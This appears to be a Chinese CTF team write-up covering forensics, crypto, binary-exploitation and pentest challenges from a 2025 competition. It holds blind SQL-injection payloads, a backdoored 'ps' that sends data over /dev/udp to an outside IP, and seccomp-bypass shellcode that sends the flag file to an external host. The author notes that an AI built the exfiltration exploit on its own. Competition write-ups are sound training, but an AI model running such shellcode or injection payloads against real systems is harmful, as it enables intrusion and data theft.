內(nèi)部賽-2025第五屆網(wǎng)絡(luò)安全攻防大賽團(tuán)隊(duì)賽-①初賽
溯源取證
Checkin
直接搜flag字符串
f1ndflag
tshark -r att.pcapng -Y "http && 54< frame.number " -e frame.number -e tcp.stream -e frame.len -e http.cookie_pair -T fields > out.txt
根據(jù)分析, POST會(huì)發(fā)一個(gè)和GET一樣的包
57 6 HTTP 400 HTTP/1.1 200 OK (text/html)
67 7 HTTP POST 312 id=1'+AND+ORD(MID((SELECT+IFNULL(CAST(table_name+AS+NCHAR),0x20)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x73746f7265+LIMIT+0,1),6,1))>64+AND+'SpqU'='SpqU,security=high,PHPSESSID=tlse8ootcss5qp5c41n0spjf42 POST /store/cookie-input.php HTTP/1.1 (application/x-www-form-urlencoded)
70 7 HTTP 1157 HTTP/1.1 200 OK (text/html)
79 8 HTTP GET 523 id=1'+AND+ORD(MID((SELECT+IFNULL(CAST(table_name+AS+NCHAR),0x20)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x73746f7265+LIMIT+0,1),6,1))>96+AND+'SpqU'='SpqU,security=high,PHPSESSID=tlse8ootcss5qp5c41n0spjf42 GET /store/ HTTP/1.1
82 8 HTTP 400 HTTP/1.1 200 OK (text/html)
92 9 HTTP POST 313 id=1'+AND+ORD(MID((SELECT+IFNULL(CAST(table_name+AS+NCHAR),0x20)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x73746f7265+LIMIT+0,1),6,1))>96+AND+'SpqU'='SpqU,security=high,PHPSESSID=tlse8ootcss5qp5c41n0spjf42 POST /store/cookie-input.php HTTP/1.1 (application/x-www-form-urlencoded)
104 10 HTTP GET 524 id=1'+AND+ORD(MID((SELECT+IFNULL(CAST(table_name+AS+NCHAR),0x20)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x73746f7265+LIMIT+0,1),6,1))>112+AND+'SpqU'='SpqU,security=high,PHPSESSID=tlse8ootcss5qp5c41n0spjf42 GET /store/ HTTP/1.1
120 11 HTTP POST 313 id=1'+AND+ORD(MID((SELECT+IFNULL(CAST(table_name+AS+NCHAR),0x20)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x73746f7265+LIMIT+0,1),6,1))>112+AND+'SpqU'='SpqU,security=high,PHPSESSID=tlse8ootcss5qp5c41n0spjf42 POST /store/cookie-input.php HTTP/1.1 (application/x-www-form-urlencoded)
123 11 HTTP 1158 HTTP/1.1 200 OK (text/html)
132 12 HTTP GET 524 id=1'+AND+ORD(MID((SELECT+IFNULL(CAST(table_name+AS+NCHAR),0x20)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x73746f7265+LIMIT+0,1),6,1))>104+AND+'SpqU'='SpqU,security=high,PHPSESSID=tlse8ootcss5qp5c41n0spjf42 GET /store/ HTTP/1.1
137 12 HTTP 1182 HTTP/1.1 404 Not Found (text/html)
只查看GET請求和響應(yīng),注入條件成功是200.失敗是404。
整理結(jié)果丟給AI快速分析出flag部分 flag{34rdfe43f4f34
流量包拆分zip。爆破密碼為abcd,key為1726354635wklkju
{"status":"c3VjY2Vzcw==","msg":"CjlmcmY0M2YzZjMzZi1mZXJlcn0K"}
{"status":"c3VjY2Vzcw==","msg":"YS5waHAKYi5waHAKZmxhZwo="}
9frf43f3f33f-ferer}
virgenina
在線爆破得到flag
奇怪的二維碼
微信掃
flag{a1f85356-817f-11f0-8dde-47e21c80f13c}
where flag
分離出一個(gè)小的 圖片。
b1,r,lsb,xy .. file: Zip archive data, at least v2.0 to extract, compression method=deflate
b1,g,lsb,xy .. file: Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
提取2個(gè)zip。一個(gè)偽加密一個(gè)爆破出 200123, 用key iv 解
分別為aesc-bytes-iv16.txt 和叫key.txt 解出來的不是flag? 隨波逐流
flag{9e4ff334cf2b69b6ac88c49b955}
hackip
root@f2e7d5134588:/etc/systemd/system# find / -type f -print0 | xargs -0 ls -lt | more
-rwxrwxrwx 1 root root 19034 Sep 16 05:43 /tmp/shadow
-rw-r--r-- 1 blue blue 0 Sep 16 05:33 /home/blue/.sudo_as_admin_successful
-rw------- 1 blue blue 58 Sep 16 05:32 /home/blue/.Xauthority
-rw-r--r-- 1 blue blue 0 Sep 16 05:30 /home/blue/.cache/motd.legal-displayed
-rw------- 1 root root 5936 Mar 31 10:22 /home/VNRSyvCiOu/.bash_history
-rwxrwxrwx 1 root root 92 Mar 31 10:22 /usr/bin/ps
-rwxrwxrwx 1 root root 115 Mar 31 10:09 /usr/bin/htop
找到 /usr/bin/ps 程序比較新,看一下有 base64解出來地址 echo -n '123' > /dev/udp/182.213.2.2/80 用戶 VNRSyvCiOu 比較新 提交即可 flag{VNRSyvCiOu_182.213.2.2}
encode
解一些包找到都是 Login Failed,自己構(gòu)造一個(gè)Login Success -> base64 搜索一下 追蹤流找到密碼。
TG9naW4gU3VjY2Vzcw==
定位到114295包,看發(fā)包的data做base64 , info的內(nèi)容再次base64得到
192.168.120.137 - - [03/Apr/2025:14:49:42 +0800] "GET /login?username=admin&password=zxcv123
HTTP/1.1" 200 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
flag{192.168.120.137_zxcv123}
密碼安全
彩票站
丟AI自己交互玩完
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import time
class DualLCG:
def __init__(self, x=None, y=None):
self.p = 32749
self.x = x if x is not None else 0
self.y = y if y is not None else 0
def next(self):
self.x = (3 * self.x + 5) % self.p
self.y = (5 * self.y + 7) % self.p
return self.x ^ self.y
def find_initial_state(output1, output2):
"""找到初始狀態(tài)"""
p = 32749
for x0 in range(p):
x1 = (3 * x0 + 5) % p
y1 = x1 ^ output1
if y1 >= p:
continue
try:
inv5 = pow(5, -1, p)
y0 = ((y1 - 7) * inv5) % p
except:
continue
# 驗(yàn)證
lcg = DualLCG(x0, y0)
if lcg.next() == output1 and lcg.next() == output2:
return x0, y0
return None, None
def test_with_timing():
"""測試帶時(shí)間間隔的發(fā)送"""
print("[+] 測試帶時(shí)間間隔的發(fā)送...")
try:
conn = remote('39.97.50.125', 11746)
# 接收初始信息
initial_data = conn.recvuntil(b'\n', timeout=10)
print(f"[+] 初始數(shù)據(jù): {initial_data.decode('utf-8', errors='ignore').strip()}")
# 接收彩票信息
lottery_info = conn.recvuntil('第1次猜測:'.encode('utf-8'), timeout=10)
lottery_text = lottery_info.decode('utf-8', errors='ignore')
print(f"[+] 彩票信息:\n{lottery_text}")
# 提取號(hào)碼
lines = lottery_text.split('\n')
numbers = []
for line in lines:
if '第一天中獎(jiǎng)號(hào)碼:' in line:
num1 = int(line.split(':')[1].strip())
numbers.append(num1)
elif '第二天中獎(jiǎng)號(hào)碼:' in line:
num2 = int(line.split(':')[1].strip())
numbers.append(num2)
print(f"[+] 提取到號(hào)碼: {numbers}")
# 破解DualLCG
x0, y0 = find_initial_state(numbers[0], numbers[1])
if x0 is None:
print("[-] 無法找到初始狀態(tài)")
return
print(f"[+] 找到初始狀態(tài): x0={x0}, y0={y0}")
# 生成預(yù)測序列
lcg = DualLCG(x0, y0)
lcg.next() # 跳過第1天
lcg.next() # 跳過第2天
predictions = []
for i in range(5):
predictions.append(lcg.next())
print(f"[+] 預(yù)測序列: {predictions}")
# 發(fā)送預(yù)測,每次之間等待
for i, pred in enumerate(predictions, 1):
print(f"\n--- 第{i}次猜測: {pred} ---")
conn.sendline(str(pred).encode())
print(f"[>] 發(fā)送: {pred}")
# 等待一段時(shí)間
time.sleep(1)
try:
response = conn.recv(timeout=5)
response_text = response.decode('utf-8', errors='ignore').strip()
print(f"[<] 響應(yīng): '{response_text}'")
if 'flag' in response_text.lower() or '{' in response_text:
print(f"[!] 找到flag: {response_text}")
return response_text
# 檢查是否有提示下一次猜測
if f'第{i+1}次猜測:' in response_text:
print(f"[+] 服務(wù)器提示下一次猜測")
continue
except Exception as e:
print(f"[!] 接收第{i}次響應(yīng)失敗: {e}")
# 嘗試接收更多數(shù)據(jù)
try:
more_data = conn.recv(timeout=3)
if more_data:
more_text = more_data.decode('utf-8', errors='ignore')
print(f"[+] 更多數(shù)據(jù): '{more_text}'")
if 'flag' in more_text.lower() or '{' in more_text:
print(f"[!] 在更多數(shù)據(jù)中找到flag: {more_text}")
return more_text
except:
pass
# 接收最終數(shù)據(jù)
print("\n[+] 嘗試接收最終數(shù)據(jù)...")
try:
final_data = conn.recvall(timeout=10)
if final_data:
final_text = final_data.decode('utf-8', errors='ignore')
print(f"[+] 最終數(shù)據(jù): '{final_text}'")
if 'flag' in final_text.lower() or '{' in final_text:
print(f"[!] 在最終數(shù)據(jù)中找到flag: {final_text}")
return final_text
except Exception as e:
print(f"[!] 接收最終數(shù)據(jù)失敗: {e}")
conn.close()
except Exception as e:
print(f"[!] 測試失敗: {e}")
import traceback
traceback.print_exc()
return None
def test_interactive_mode():
"""測試交互模式 - 等待服務(wù)器提示"""
print("\n[+] 測試交互模式...")
try:
conn = remote('39.97.50.125', 11746)
# 接收所有初始數(shù)據(jù)
print("[+] 接收初始數(shù)據(jù)...")
initial_data = b""
while True:
try:
data = conn.recv(timeout=3)
if not data:
break
initial_data += data
print(f"[+] 接收到: {data.decode('utf-8', errors='ignore')}")
# 檢查是否有猜測提示
if '第1次猜測:' in data.decode('utf-8', errors='ignore'):
break
except:
break
initial_text = initial_data.decode('utf-8', errors='ignore')
print(f"[+] 完整初始數(shù)據(jù):\n{initial_text}")
# 提取號(hào)碼
lines = initial_text.split('\n')
numbers = []
for line in lines:
if '第一天中獎(jiǎng)號(hào)碼:' in line:
num1 = int(line.split(':')[1].strip())
numbers.append(num1)
elif '第二天中獎(jiǎng)號(hào)碼:' in line:
num2 = int(line.split(':')[1].strip())
numbers.append(num2)
print(f"[+] 提取到號(hào)碼: {numbers}")
# 破解DualLCG
x0, y0 = find_initial_state(numbers[0], numbers[1])
if x0 is None:
print("[-] 無法找到初始狀態(tài)")
return
print(f"[+] 找到初始狀態(tài): x0={x0}, y0={y0}")
# 生成預(yù)測序列
lcg = DualLCG(x0, y0)
lcg.next() # 跳過第1天
lcg.next() # 跳過第2天
predictions = []
for i in range(5):
predictions.append(lcg.next())
print(f"[+] 預(yù)測序列: {predictions}")
# 交互式發(fā)送
for i, pred in enumerate(predictions, 1):
print(f"\n--- 發(fā)送第{i}次猜測: {pred} ---")
conn.sendline(str(pred).encode())
print(f"[>] 發(fā)送: {pred}")
# 接收所有可能的響應(yīng)
response_data = b""
while True:
try:
data = conn.recv(timeout=5)
if not data:
break
response_data += data
print(f"[+] 接收到數(shù)據(jù): {data.decode('utf-8', errors='ignore')}")
# 檢查是否包含flag
text = data.decode('utf-8', errors='ignore')
if 'flag' in text.lower() or '{' in text:
print(f"[!] 找到flag: {text}")
return text
# 檢查是否有下一次猜測提示
if f'第{i+1}次猜測:' in text:
print(f"[+] 服務(wù)器提示第{i+1}次猜測")
break
# 如果是最后一次猜測,繼續(xù)接收
if i == 5:
continue
else:
break
except Exception as e:
print(f"[!] 接收超時(shí)或錯(cuò)誤: {e}")
break
if response_data:
response_text = response_data.decode('utf-8', errors='ignore')
print(f"[<] 完整響應(yīng): '{response_text}'")
if 'flag' in response_text.lower() or '{' in response_text:
print(f"[!] 在完整響應(yīng)中找到flag: {response_text}")
return response_text
# 最后嘗試接收任何剩余數(shù)據(jù)
print("\n[+] 接收最終數(shù)據(jù)...")
try:
final_data = conn.recvall(timeout=10)
if final_data:
final_text = final_data.decode('utf-8', errors='ignore')
print(f"[+] 最終數(shù)據(jù): '{final_text}'")
if 'flag' in final_text.lower() or '{' in final_text:
print(f"[!] 在最終數(shù)據(jù)中找到flag: {final_text}")
return final_text
except Exception as e:
print(f"[!] 接收最終數(shù)據(jù)失敗: {e}")
conn.close()
except Exception as e:
print(f"[!] 交互測試失敗: {e}")
import traceback
traceback.print_exc()
return None
if __name__ == '__main__':
result1 = test_with_timing()
if result1:
print(f"\n[!] 時(shí)間測試找到flag: {result1}")
else:
result2 = test_interactive_mode()
if result2:
print(f"\n[!] 交互測試找到flag: {result2}")
else:
print("\n[!] 所有測試都失敗了")
二進(jìn)制漏洞挖掘與利用
Sandbox
丟給ai研究了一會(huì)兒說能反彈shell, 開了個(gè)監(jiān)聽給它自己完成了
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import sys
import socket
import threading
# 設(shè)置上下文
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'debug'
def exploit():
# 連接到目標(biāo)程序
p = remote('39.97.50.51', 10430)
# 等待程序輸出提示符
p.recvuntil(b'> ')
# Seccomp規(guī)則分析:
# 從規(guī)則可以看出,只有以下系統(tǒng)調(diào)用被明確禁止:
# read(0), write(1), pread64(17), readv(19), writev(20), execve(59), preadv(295), preadv2(327)
# 其他系統(tǒng)調(diào)用都是允許的,包括: socket(41), connect(42), dup2(33), execveat(322), open(2), close(3), sendfile(40)
#
# 但是execveat可能仍然有問題,讓我們嘗試不同的方法:
# 1. 創(chuàng)建socket并連接到攻擊者服務(wù)器
# 2. 直接發(fā)送flag文件內(nèi)容到socket,而不是建立shell
# 3. 使用open打開flag文件,然后用sendfile發(fā)送內(nèi)容
try:
# 構(gòu)造發(fā)送flag內(nèi)容的shellcode
# IP: 101.201.56.60 -> 0x3c38c965 (小端序)
# Port: 2127 -> 0x4f08 (小端序)
shellcode = (
# socket(AF_INET, SOCK_STREAM, 0)
b"\x48\x31\xc0" # xor rax, rax
b"\x48\x83\xc0\x29" # add rax, 41 (socket)
b"\x48\x31\xff" # xor rdi, rdi
b"\x48\x83\xc7\x02" # add rdi, 2 (AF_INET)
b"\x48\x31\xf6" # xor rsi, rsi
b"\x48\x83\xc6\x01" # add rsi, 1 (SOCK_STREAM)
b"\x48\x31\xd2" # xor rdx, rdx
b"\x0f\x05" # syscall
b"\x49\x89\xc0" # mov r8, rax (save socket fd)
# connect(sockfd, &addr, sizeof(addr))
b"\x48\x31\xd2" # xor rdx, rdx
b"\x52" # push rdx (padding)
b"\x52" # push rdx (padding)
b"\x68\x65\xc9\x38\x3c" # push 0x3c38c965 (IP: 101.201.56.60)
b"\x66\x68\x08\x4f" # push 0x4f08 (port 2127)
b"\x66\x6a\x02" # push 2 (AF_INET)
b"\x48\x89\xe6" # mov rsi, rsp (addr)
b"\x4c\x89\xc7" # mov rdi, r8 (socket fd)
b"\x48\x31\xd2" # xor rdx, rdx
b"\x48\x83\xc2\x10" # add rdx, 16 (sizeof(sockaddr_in))
b"\x48\x31\xc0" # xor rax, rax
b"\x48\x83\xc0\x2a" # add rax, 42 (connect)
b"\x0f\x05" # syscall
# open("flag", O_RDONLY)
b"\x48\x31\xd2" # xor rdx, rdx
b"\x52" # push rdx (null terminator)
b"\x68\x66\x6c\x61\x67" # push "flag"
b"\x48\x89\xe7" # mov rdi, rsp (filename)
b"\x48\x31\xf6" # xor rsi, rsi (O_RDONLY)
b"\x48\x31\xc0" # xor rax, rax
b"\x48\x83\xc0\x02" # add rax, 2 (open)
b"\x0f\x05" # syscall
b"\x49\x89\xc1" # mov r9, rax (save file fd)
# sendfile(sockfd, filefd, NULL, 1024)
b"\x4c\x89\xc7" # mov rdi, r8 (socket fd)
b"\x4c\x89\xce" # mov rsi, r9 (file fd)
b"\x48\x31\xd2" # xor rdx, rdx (offset = NULL)
b"\x48\x31\xc9" # xor rcx, rcx
b"\x48\x81\xc1\x00\x04\x00\x00" # add rcx, 1024 (count)
b"\x48\x31\xc0" # xor rax, rax
b"\x48\x83\xc0\x28" # add rax, 40 (sendfile)
b"\x0f\x05" # syscall
# close(filefd)
b"\x4c\x89\xcf" # mov rdi, r9 (file fd)
b"\x48\x31\xc0" # xor rax, rax
b"\x48\x83\xc0\x03" # add rax, 3 (close)
b"\x0f\x05" # syscall
# close(sockfd)
b"\x4c\x89\xc7" # mov rdi, r8 (socket fd)
b"\x48\x31\xc0" # xor rax, rax
b"\x48\x83\xc0\x03" # add rax, 3 (close)
b"\x0f\x05" # syscall
# exit(0)
b"\x48\x31\xff" # xor rdi, rdi
b"\x48\x31\xc0" # xor rax, rax
b"\x48\x83\xc0\x3c" # add rax, 60 (exit)
b"\x0f\x05" # syscall
)
payload = shellcode
print(f"Reverse shell payload length: {len(payload)}")
except Exception as e:
print(f"Shellcode construction failed: {e}")
# 備用方案:簡單的exit測試
payload = b'\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05' # exit(0)
# 確保payload不超過0x1000字節(jié)
if len(payload) > 0x1000:
print("Payload too large!")
return
print(f"Payload length: {len(payload)}")
print(f"Payload hex: {payload.hex()}")
# 發(fā)送payload
p.send(payload)
# 等待一下讓shellcode執(zhí)行
import time
time.sleep(1)
# 等待shellcode執(zhí)行
print("Waiting for shellcode to execute and establish reverse connection...")
time.sleep(5) # 增加等待時(shí)間
# 關(guān)閉與目標(biāo)的連接
p.close()
# 連接到外部服務(wù)器接收flag內(nèi)容
print("Connecting to 101.201.56.60:2127 to receive flag content...")
try:
# 連接到外部服務(wù)器
# flag_conn = remote('xx.xx.xx.xx', 2127, timeout=10)
flag_conn = remote('xx.xx.xx.xx', 2127, timeout=10)
print("Connected to flag server!")
# 接收flag內(nèi)容
try:
print("Waiting for flag content...")
flag_data = flag_conn.recv(timeout=10)
if flag_data:
print(f"Flag content received: {flag_data.decode('utf-8', errors='ignore')}")
print(f"Raw flag data: {flag_data}")
print("Successfully retrieved flag!")
# 嘗試接收更多數(shù)據(jù)
try:
flag_conn.settimeout(2)
more_data = flag_conn.recv(1024)
if more_data:
print(f"Additional flag data: {more_data.decode('utf-8', errors='ignore')}")
except:
pass
else:
print("No flag content received")
print("This might indicate the shellcode didn't execute successfully")
except Exception as e:
print(f"Timeout or error receiving flag: {e}")
print("Flag reception failed - 10 second timeout reached")
flag_conn.close()
except Exception as e:
print(f"Connection error: {e}")
print("Failed to connect to flag server")
print("This might mean the shellcode didn't execute successfully or the server is not listening")
if __name__ == '__main__':
exploit()
AI安全
最強(qiáng)大腦
隨便聊
黑白?
直接丟AI出flag
import os
from PIL import Image
import numpy as np
def analyze_quadrants(img_array):
"""分析圖片的四個(gè)象限"""
h, w = img_array.shape
mid_h, mid_w = h // 2, w // 2
# 分割成四個(gè)象限
top_left = img_array[:mid_h, :mid_w]
top_right = img_array[:mid_h, mid_w:]
bottom_left = img_array[mid_h:, :mid_w]
bottom_right = img_array[mid_h:, mid_w:]
quadrants = {
'top_left': top_left,
'top_right': top_right,
'bottom_left': bottom_left,
'bottom_right': bottom_right
}
print("四個(gè)象限分析:")
for name, quad in quadrants.items():
avg_val = np.mean(quad)
print(f" {name}: 平均像素值 = {avg_val:.2f}, 范圍 = {quad.min()}-{quad.max()}")
return quadrants
def classify_image(img_array, threshold=128):
"""根據(jù)平均像素值分類圖片"""
avg_pixel = np.mean(img_array)
return 1 if avg_pixel > threshold else 0
def analyze_image_detailed(image_path):
"""詳細(xì)分析單張圖片"""
img = Image.open(image_path)
img_array = np.array(img)
print(f"\n=== 分析圖片: {os.path.basename(image_path)} ===")
print(f"圖片尺寸: {img.size}")
print(f"平均像素值: {np.mean(img_array):.2f}")
print(f"像素值范圍: {img_array.min()} - {img_array.max()}")
# 分析四個(gè)象限
quadrants = analyze_quadrants(img_array)
# 分類預(yù)測
predicted_class = classify_image(img_array)
print(f"預(yù)測類別: {predicted_class}")
return img_array, quadrants, predicted_class
def main():
train_dir = "黑白?/train_images"
test_dir = "黑白?/test_images"
print("=== 詳細(xì)分析訓(xùn)練圖片 ===")
# 分析train_0的幾張圖片
print("\n--- train_0 類別 ---")
train_0_files = [f for f in os.listdir(train_dir) if f.startswith('train_0_')][:3]
for filename in train_0_files:
img_path = os.path.join(train_dir, filename)
analyze_image_detailed(img_path)
# 分析train_1的幾張圖片
print("\n--- train_1 類別 ---")
train_1_files = [f for f in os.listdir(train_dir) if f.startswith('train_1_')][:3]
for filename in train_1_files:
img_path = os.path.join(train_dir, filename)
analyze_image_detailed(img_path)
print("\n=== 分析測試圖片 ===")
test_files = sorted([f for f in os.listdir(test_dir) if f.endswith('.png')])[:5]
predictions = []
for filename in test_files:
img_path = os.path.join(test_dir, filename)
img_array, quadrants, predicted_class = analyze_image_detailed(img_path)
predictions.append(predicted_class)
print(f"\n前5張測試圖片的預(yù)測結(jié)果: {predictions}")
print(f"二進(jìn)制字符串: {''.join(map(str, predictions))}")
# 分析所有測試圖片
print("\n=== 處理所有測試圖片 ===")
all_test_files = sorted([f for f in os.listdir(test_dir) if f.endswith('.png')])
all_predictions = []
for filename in all_test_files:
img_path = os.path.join(test_dir, filename)
img = Image.open(img_path)
img_array = np.array(img)
predicted_class = classify_image(img_array)
all_predictions.append(predicted_class)
binary_string = ''.join(map(str, all_predictions))
print(f"所有測試圖片數(shù)量: {len(all_predictions)}")
print(f"完整二進(jìn)制字符串: {binary_string}")
print(f"二進(jìn)制字符串長度: {len(binary_string)}")
# 轉(zhuǎn)換為字節(jié)
if len(binary_string) % 8 == 0:
bytes_data = []
for i in range(0, len(binary_string), 8):
byte_str = binary_string[i:i+8]
byte_val = int(byte_str, 2)
bytes_data.append(byte_val)
# 轉(zhuǎn)換為字符串
try:
result_string = ''.join(chr(b) for b in bytes_data)
print(f"\n轉(zhuǎn)換后的字符串: {result_string}")
print(f"Flag: flag{{{result_string}}}")
except:
print(f"\n字節(jié)數(shù)據(jù): {bytes_data}")
print("無法直接轉(zhuǎn)換為ASCII字符串")
else:
print(f"二進(jìn)制字符串長度不是8的倍數(shù): {len(binary_string)}")
if __name__ == "__main__":
main()
flag{yuo_kn0w_knn!}
滲透測試
時(shí)間旅行者
根據(jù)題意,構(gòu)建將來的時(shí)間發(fā)包,使用
GET / HTTP/1.1
Host: 39.97.50.51:12395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Date: Mon, 01 Jan 2030 00:00:00 GMT
User-Agent: Mozilla/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
HTTP/1.1 200 OK
Server: Werkzeug/3.1.3 Python/3.9.21
Date: Tue, 16 Sep 2025 03:54:39 GMT
Content-Type: application/json
Content-Length: 38
Connection: close
{"flag":"flag{jvaLJAz3zAWGPCxhzjyh}"}
浙公網(wǎng)安備 33010602011771號(hào)